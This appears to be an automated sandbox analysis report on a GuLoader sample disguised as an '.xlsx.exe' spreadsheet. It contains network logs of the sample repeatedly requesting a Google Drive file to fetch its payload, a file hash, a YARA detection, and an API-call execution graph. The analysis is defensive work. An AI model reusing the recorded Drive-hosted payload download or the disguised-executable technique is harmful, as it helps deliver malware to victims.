                                                        33 | 192.168.2.8 | 49835 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:11 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:12 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5ozpAEHkuppLAQ9PArqfo4tPKnWOHgAuXm109UaJIcyanH9G9lPQIOH88n8MyDCsyJ
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:12 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-ODkTMDIOPuSNloouDxM17Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:12 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7Xr-Pgg35e--HadmwFIZPg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        34 | 192.168.2.8 | 49841 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:14 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:15 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-L_DBuh_sdhFihDW1uRprow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        35 | 192.168.2.8 | 49849 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:17 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:18 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4qPwmxkdT5dJy6YRHHg3n6lMNkesTwzBPhCD3RAsjeoCdrQcX4Ybh3vK09gLjSrtOT
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:17 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-_rMKfn0T2OhGkyRljhcTXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:59:18 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bsn2wu-hXu74r-efzDg_KQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        36 | 192.168.2.8 | 49856 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:59:20 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:59:21 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:20 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: script-src 'nonce-mqZS1wnNCl-JrgT09RcU5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID:37
                                                        Source IP:192.168.2.8
                                                        Source Port:49863
                                                        Destination IP:142.250.181.1
                                                        Destination Port:443
                                                        PID:928
                                                        Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp:2024-12-16 16:59:22 UTC
                                                        Bytes transferred:459
                                                        Direction:OUT
                                                        Data:
                                                        GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        Timestamp:2024-12-16 16:59:23 UTC
                                                        Bytes transferred:1844
                                                        Direction:IN
                                                        Data:
                                                        HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC6GhEO2Ai7sCU3mZfLPhYZMc-mWA1OS5TP9sBmXECW-Eq4KJtAWLFA_ioIH1eOq8vOB
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:59:23 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-QhHo2obnTG8bAW07l18oUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        Timestamp:2024-12-16 16:59:23 UTC
                                                        Bytes transferred:1652
                                                        Direction:IN
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rW5yozoqek_Lt14YnEVMeA">*{margin:0;padding:0}html,code{font:15px/22px arial



                                                        Target ID:0
                                                        Start time:11:57:17
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
                                                        Imagebase:0x400000
                                                        File size:530'598 bytes
                                                        MD5 hash:321A9608E5BF03BF63F4574D0DF1A380
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1600421494.0000000007ED3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:11:57:27
                                                        Start date:16/12/2024
                                                        Path:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe"
                                                        Imagebase:0x400000
                                                        File size:530'598 bytes
                                                        MD5 hash:321A9608E5BF03BF63F4574D0DF1A380
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2751336924.0000000004A43000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:20%
                                                          Dynamic/Decrypted Code Coverage:13.7%
                                                          Signature Coverage:19%
                                                          Total number of Nodes:1513
                                                          Total number of Limit Nodes:40
402777 FindFirstFileW 5260->5261 5262 40278a 5261->5262 5263 40279f 5261->5263 5264 4027a8 5263->5264 5267 405e8f wsprintfW 5263->5267 5268 405f48 lstrcpynW 5264->5268 5267->5264 5268->5262 5269 4014f1 SetForegroundWindow 5270 4029c7 5269->5270 5271 4018f2 5272 402b3a 18 API calls 5271->5272 5273 4018f9 5272->5273 5274 405724 MessageBoxIndirectW 5273->5274 5275 401902 5274->5275 4438 402573 4450 402b1d 4438->4450 4440 4026a0 4441 4025c8 ReadFile 4441->4440 4445 402582 4441->4445 4442 405c37 ReadFile 4442->4445 4443 4026a2 4453 405e8f wsprintfW 4443->4453 4444 402608 MultiByteToWideChar 4444->4445 4445->4440 4445->4441 4445->4442 4445->4443 4445->4444 4447 40262e SetFilePointer MultiByteToWideChar 4445->4447 4448 4026b3 4445->4448 4447->4445 4448->4440 4449 4026d4 SetFilePointer 4448->4449 4449->4440 4451 405f6a 18 API calls 4450->4451 4452 402b31 4451->4452 4452->4445 4453->4440 5276 401df3 5277 402b3a 18 API calls 5276->5277 5278 401df9 5277->5278 5279 402b3a 18 API calls 5278->5279 5280 401e02 5279->5280 5281 402b3a 18 API calls 5280->5281 5282 401e0b 5281->5282 5283 402b3a 18 API calls 5282->5283 5284 401e14 5283->5284 5285 401423 25 API calls 5284->5285 5286 401e1b ShellExecuteW 5285->5286 5287 401e4c 5286->5287 5293 100016b6 5294 100016e5 5293->5294 5295 10001b18 22 API calls 5294->5295 5296 100016ec 5295->5296 5297 100016f3 5296->5297 5298 100016ff 5296->5298 5299 10001272 2 API calls 5297->5299 5300 10001726 5298->5300 5301 10001709 5298->5301 5304 100016fd 5299->5304 5302 10001750 5300->5302 5303 1000172c 5300->5303 5305 1000153d 3 API calls 5301->5305 5307 1000153d 3 API calls 5302->5307 5306 100015b4 3 API calls 5303->5306 5308 1000170e 5305->5308 5309 10001731 5306->5309 5307->5304 5310 100015b4 3 API calls 5308->5310 5312 10001272 2 API calls 5309->5312 5311 10001714 5310->5311 5313 10001272 2 API calls 5311->5313 5314 10001737 GlobalFree 5312->5314 5315 1000171a GlobalFree 5313->5315 5314->5304 5316 1000174b GlobalFree 5314->5316 5315->5304 5316->5304 
5317 10002238 5318 10002296 5317->5318 5319 100022cc 5317->5319 5318->5319 5320 100022a8 GlobalAlloc 5318->5320 5320->5318 4672 4026f9 4673 402700 4672->4673 4676 402972 4672->4676 4674 402b1d 18 API calls 4673->4674 4675 40270b 4674->4675 4677 402712 SetFilePointer 4675->4677 4677->4676 4678 402722 4677->4678 4680 405e8f wsprintfW 4678->4680 4680->4676 5321 1000103d 5324 1000101b 5321->5324 5331 10001516 5324->5331 5326 10001020 5327 10001024 5326->5327 5328 10001027 GlobalAlloc 5326->5328 5329 1000153d 3 API calls 5327->5329 5328->5327 5330 1000103b 5329->5330 5333 1000151c 5331->5333 5332 10001522 5332->5326 5333->5332 5334 1000152e GlobalFree 5333->5334 5334->5326 5335 402c7f 5336 402c91 SetTimer 5335->5336 5337 402caa 5335->5337 5336->5337 5338 402cf8 5337->5338 5339 402cfe MulDiv 5337->5339 5340 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5339->5340 5340->5338 5342 4014ff 5343 401507 5342->5343 5345 40151a 5342->5345 5344 402b1d 18 API calls 5343->5344 5344->5345 5346 401000 5347 401037 BeginPaint GetClientRect 5346->5347 5350 40100c DefWindowProcW 5346->5350 5348 4010f3 5347->5348 5352 401073 CreateBrushIndirect FillRect DeleteObject 5348->5352 5353 4010fc 5348->5353 5351 401179 5350->5351 5352->5348 5354 401102 CreateFontIndirectW 5353->5354 5355 401167 EndPaint 5353->5355 5354->5355 5356 401112 6 API calls 5354->5356 5355->5351 5356->5355 5357 401a00 5358 402b3a 18 API calls 5357->5358 5359 401a09 ExpandEnvironmentStringsW 5358->5359 5360 401a1d 5359->5360 5362 401a30 5359->5362 5361 401a22 lstrcmpW 5360->5361 5360->5362 5361->5362 5363 401b01 5364 402b3a 18 API calls 5363->5364 5365 401b08 5364->5365 5366 402b1d 18 API calls 5365->5366 5367 401b11 wsprintfW 5366->5367 5368 4029c7 5367->5368 4240 100027c7 4241 10002817 4240->4241 4242 100027d7 VirtualProtect 4240->4242 4242->4241 5376 401f08 5377 402b3a 18 API calls 5376->5377 5378 401f0f GetFileVersionInfoSizeW 5377->5378 5379 401f36 GlobalAlloc 5378->5379 5380 401f8c 5378->5380 5379->5380 5381 401f4a 
GetFileVersionInfoW 5379->5381 5381->5380 5382 401f59 VerQueryValueW 5381->5382 5382->5380 5383 401f72 5382->5383 5387 405e8f wsprintfW 5383->5387 5385 401f7e 5388 405e8f wsprintfW 5385->5388 5387->5385 5388->5380 5389 401c8e 5390 402b1d 18 API calls 5389->5390 5391 401c94 IsWindow 5390->5391 5392 4019f0 5391->5392 5393 1000164f 5394 10001516 GlobalFree 5393->5394 5396 10001667 5394->5396 5395 100016ad GlobalFree 5396->5395 5397 10001682 5396->5397 5398 10001699 VirtualFree 5396->5398 5397->5395 5398->5395 5406 401491 5407 4051f2 25 API calls 5406->5407 5408 401498 5407->5408 4477 402295 4478 402b3a 18 API calls 4477->4478 4479 4022a4 4478->4479 4480 402b3a 18 API calls 4479->4480 4481 4022ad 4480->4481 4482 402b3a 18 API calls 4481->4482 4483 4022b7 GetPrivateProfileStringW 4482->4483 4489 401f98 4490 40205c 4489->4490 4491 401faa 4489->4491 4494 401423 25 API calls 4490->4494 4492 402b3a 18 API calls 4491->4492 4493 401fb1 4492->4493 4495 402b3a 18 API calls 4493->4495 4499 402197 4494->4499 4496 401fba 4495->4496 4497 401fd0 LoadLibraryExW 4496->4497 4498 401fc2 GetModuleHandleW 4496->4498 4497->4490 4500 401fe1 4497->4500 4498->4497 4498->4500 4512 40631e WideCharToMultiByte 4500->4512 4503 401ff2 4506 402011 4503->4506 4507 401ffa 4503->4507 4504 40202b 4505 4051f2 25 API calls 4504->4505 4508 402002 4505->4508 4515 10001759 4506->4515 4509 401423 25 API calls 4507->4509 4508->4499 4510 40204e FreeLibrary 4508->4510 4509->4508 4510->4499 4513 406348 GetProcAddress 4512->4513 4514 401fec 4512->4514 4513->4514 4514->4503 4514->4504 4516 10001789 4515->4516 4557 10001b18 4516->4557 4518 10001790 4519 100018a6 4518->4519 4520 100017a1 4518->4520 4521 100017a8 4518->4521 4519->4508 4606 10002286 4520->4606 4589 100022d0 4521->4589 4526 100017cd 4528 1000180c 4526->4528 4529 100017ee 4526->4529 4527 100017be 4531 100017c4 4527->4531 4536 100017cf 4527->4536 4532 10001812 4528->4532 4533 1000184e 4528->4533 4619 100024a9 4529->4619 4531->4526 4600 100028a4 4531->4600 
4538 100015b4 3 API calls 4532->4538 4540 100024a9 10 API calls 4533->4540 4534 100017d7 4534->4526 4616 10002b5f 4534->4616 4535 100017f4 4630 100015b4 4535->4630 4610 10002645 4536->4610 4543 10001828 4538->4543 4544 10001840 4540->4544 4547 100024a9 10 API calls 4543->4547 4548 10001895 4544->4548 4641 1000246c 4544->4641 4546 100017d5 4546->4526 4547->4544 4548->4519 4552 1000189f GlobalFree 4548->4552 4552->4519 4554 10001881 4554->4548 4645 1000153d wsprintfW 4554->4645 4555 1000187a FreeLibrary 4555->4554 4648 1000121b GlobalAlloc 4557->4648 4559 10001b3c 4649 1000121b GlobalAlloc 4559->4649 4561 10001d7a GlobalFree GlobalFree GlobalFree 4562 10001d97 4561->4562 4573 10001de1 4561->4573 4564 100020ee 4562->4564 4572 10001dac 4562->4572 4562->4573 4563 10001b47 4563->4561 4565 10001c1d GlobalAlloc 4563->4565 4567 10001c86 GlobalFree 4563->4567 4570 10001c68 lstrcpyW 4563->4570 4563->4573 4574 10001c72 lstrcpyW 4563->4574 4578 10002048 4563->4578 4582 10001f37 GlobalFree 4563->4582 4586 1000122c 2 API calls 4563->4586 4587 10001cc4 4563->4587 4655 1000121b GlobalAlloc 4563->4655 4566 10002110 GetModuleHandleW 4564->4566 4564->4573 4565->4563 4568 10002121 LoadLibraryW 4566->4568 4569 10002136 4566->4569 4567->4563 4568->4569 4568->4573 4656 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4569->4656 4570->4574 4572->4573 4652 1000122c 4572->4652 4573->4518 4574->4563 4575 10002188 4575->4573 4576 10002195 lstrlenW 4575->4576 4657 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4576->4657 4578->4573 4581 10002090 lstrcpyW 4578->4581 4581->4573 4582->4563 4583 10002148 4583->4575 4588 10002172 GetProcAddress 4583->4588 4584 100021af 4584->4573 4586->4563 4587->4563 4650 1000158f GlobalSize GlobalAlloc 4587->4650 4588->4575 4590 100022e8 4589->4590 4592 10002415 GlobalFree 4590->4592 4593 100023d3 lstrlenW 4590->4593 4594 100023ba GlobalAlloc CLSIDFromString 4590->4594 4595 1000238f 
GlobalAlloc WideCharToMultiByte 4590->4595 4597 1000122c GlobalAlloc lstrcpynW 4590->4597 4659 100012ba 4590->4659 4592->4590 4596 100017ae 4592->4596 4593->4592 4599 100023de 4593->4599 4594->4592 4595->4592 4596->4526 4596->4527 4596->4534 4597->4590 4599->4592 4663 100025d9 4599->4663 4602 100028b6 4600->4602 4601 1000295b EnumWindows 4603 10002979 4601->4603 4602->4601 4604 10002a75 4603->4604 4605 10002a6a GetLastError 4603->4605 4604->4526 4605->4604 4607 10002296 4606->4607 4609 100017a7 4606->4609 4608 100022a8 GlobalAlloc 4607->4608 4607->4609 4608->4607 4609->4521 4614 10002661 4610->4614 4611 100026b2 GlobalAlloc 4615 100026d4 4611->4615 4612 100026c5 4613 100026ca GlobalSize 4612->4613 4612->4615 4613->4615 4614->4611 4614->4612 4615->4546 4617 10002b6a 4616->4617 4618 10002baa GlobalFree 4617->4618 4666 1000121b GlobalAlloc 4619->4666 4621 10002530 StringFromGUID2 4624 100024b3 4621->4624 4622 10002541 lstrcpynW 4622->4624 4623 1000250b MultiByteToWideChar 4623->4624 4624->4621 4624->4622 4624->4623 4625 10002554 wsprintfW 4624->4625 4626 10002571 GlobalFree 4624->4626 4627 100025ac GlobalFree 4624->4627 4628 10001272 2 API calls 4624->4628 4667 100012e1 4624->4667 4625->4624 4626->4624 4627->4535 4628->4624 4671 1000121b GlobalAlloc 4630->4671 4632 100015ba 4633 100015c7 lstrcpyW 4632->4633 4635 100015e1 4632->4635 4636 100015fb 4633->4636 4635->4636 4637 100015e6 wsprintfW 4635->4637 4638 10001272 4636->4638 4637->4636 4639 100012b5 GlobalFree 4638->4639 4640 1000127b GlobalAlloc lstrcpynW 4638->4640 4639->4544 4640->4639 4642 10001861 4641->4642 4643 1000247a 4641->4643 4642->4554 4642->4555 4643->4642 4644 10002496 GlobalFree 4643->4644 4644->4643 4646 10001272 2 API calls 4645->4646 4647 1000155e 4646->4647 4647->4548 4648->4559 